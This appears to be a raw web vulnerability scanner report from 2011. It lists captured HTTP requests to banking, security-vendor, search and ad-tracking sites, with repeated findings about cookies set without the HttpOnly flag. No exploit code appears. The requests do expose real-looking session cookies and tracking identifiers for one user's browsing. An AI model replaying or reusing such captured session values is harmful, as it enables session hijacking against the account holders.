GET /preview/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&view_id=89fdd0457a773fb9e78a2ee3e0b8ebd3&goto=Go%20to%20%25URL&direct=1&sc=2&rss=1 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shot/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c7375&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icon&domain=www.slaviks-blog.com HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
//<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
90010394_reset=1303820950;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /al.asp?ts=20110426142115&adid=0%2C0%2C0%2C0%2C4513%2C0&cc=us&di=31742909%2C31742907%2C31742978%2C31326997%2C31051141%2C31326990&hk=1&ipid=10143&mh=b5e073b8ec12fc1181fc2fd3b1a46a79&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=35e167e1c66fee62be98fe397190a726&pvu=59196390591647FA9372FACB8C10DBA5&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=327%2C302%3B265%2C378%3B722%2C499%3B581%2C620%3B401%2C989%3B319%2C1289%3B&prf=ll%3A5003%7Cintl%3A6792%7Cpreprochrome%3A2%7Cgetconchrome%3A56%7Cadvint%3A6889%7Cadvl%3A6889%7Ctl%3A9596&jscallback=$iTXT.js.callback1 HTTP/1.1 Host: spamlaws.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/ Content-Type: text/javascript Content-Length: 38 Date: Tue, 26 Apr 2011 14:21:08 GMT Age: 0 Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intellitxt/front.asp?ipid=10143 HTTP/1.1 Host: spamlaws.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviQskDAA-
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8vJgA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:20:56 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8vJgA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:20:56 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 14:20:56 GMT Age: 0 Connection: keep-alive Content-Length: 11702
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
zenid=7fb8442f26d1db353ad8306c5db292f6; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php?main_page=product_info&cPath=5&products_id=9 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /support-center/ HTTP/1.1 Host: support.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c HTTP/1.1 Host: tc.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pcha/download?3562113 HTTP/1.1 Host: threats2.paretologic.safecart.com Proxy-Connection: keep-alive Referer: http://www.cleanallspyware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: paretologic=4L4db6cea6aaf4b16-mydownload-rwire
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/ajs.php?zoneid=45&source=&cb=65855124824&loc=http%3A//www.spamlaws.com/spam-blocker.html HTTP/1.1 Host: tracking.hearthstoneonline.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /www/delivery/lg.php?bannerid=447&campaignid=175&zoneid=45&loc=1&referer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&cb=c0bdae5d0b HTTP/1.1 Host: tracking.hearthstoneonline.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; OAID=0fb6857ace8480772f6bd0dd83570b75
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /statuses/user_timeline/hugthecloud.json?callback=twitterCallback2&count=5 HTTP/1.1 Host: twitter.com Proxy-Connection: keep-alive Referer: http://www.hugthecloud.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2
twitterCallback2([{"in_reply_to_user_id":61437533,"truncated":false,"text":"@sven_kr re: hosting - those R good choices but if u want high availability at the hardware level try vCloud Express by Virt ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/?page=login&cmd=approval&a=1">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756&muid=NOMEMBER&lastpage=%2FDefault%2Easp%3Fcachecommand%3Dbypass&loadtime=0.55 HTTP/1.1 Host: www.afreshbunch.com Proxy-Connection: keep-alive Referer: http://www.afreshbunch.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: site=referring%5Fsite=; ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adtrack/index.cgi?adlink=000309029q890000g161 HTTP/1.1 Host: www.bankofamerica.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; JSESSIONID=0000IQncNGlie79He7SZqIjFdOC:15bvh5047; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257<i=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Tue, 26 Apr 2011 12:23:46 GMT Content-length: 0 P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-cookie: TRACKING_CODE=000309029q890000g161; path=/; expires=Sunday, 23-Oct-2011 23:59:59 GMT Set-cookie: PROMO=000309029q890000g161; path=/; Location: https://www.bankofamerica.com/ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161 Set-Cookie: BIGipServerngen-www.80=910603947.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Tue, 26 Apr 2011 12:26:17 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: BIGipServerngen-www.80=3108419243.20480.0000; path=/ Content-Length: 13409
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/*HM_ScriptDOM.js * by Peter Belesis. v4.3 020605 * Copyright (c) 2002 Peter Belesis. All Rights Reserved. * Originally published and documented at http://www.dhtmlab.com/ * Available solely from INT ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
// Configurable throttle values. var throttle_percent_ngen = 100; var throttle_percent_olb = 100; var throttle_counter_active = false; var throttle_counter_percent = 0;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /military HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /military/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; SRCHD=MS=1740344&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=I=1&TS=1303826034
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /collect/?fmt=gif&url=response.firstdata.com&pid=1009 HTTP/1.1 Host: www.bizographics.com Proxy-Connection: keep-alive Referer: http://response.firstdata.com/?elqPURLPage=15 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=xpA78UaP5mY4YDpjM3cPh9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQFMYVM1J6enaj5XcunNcMDa7Re6IGD4lDGXtlaauKpHAd6xyMUDLG6HwNFYBuERpuip6J7BXd0x4sE9pUJC88Pe5yXHOj6bWJ8aODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw7c8rqipRMEYPOEhN8UMj4XYITcDlTehMXv6yypp6AmSipxPddYpylx7e4dpBDiij57vFe2oBf0ipmt6RRlAydgIWkGDyfisfDPHdMovfSDMpZP3LipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; BizoNetworkPartnerIndex=3
Response
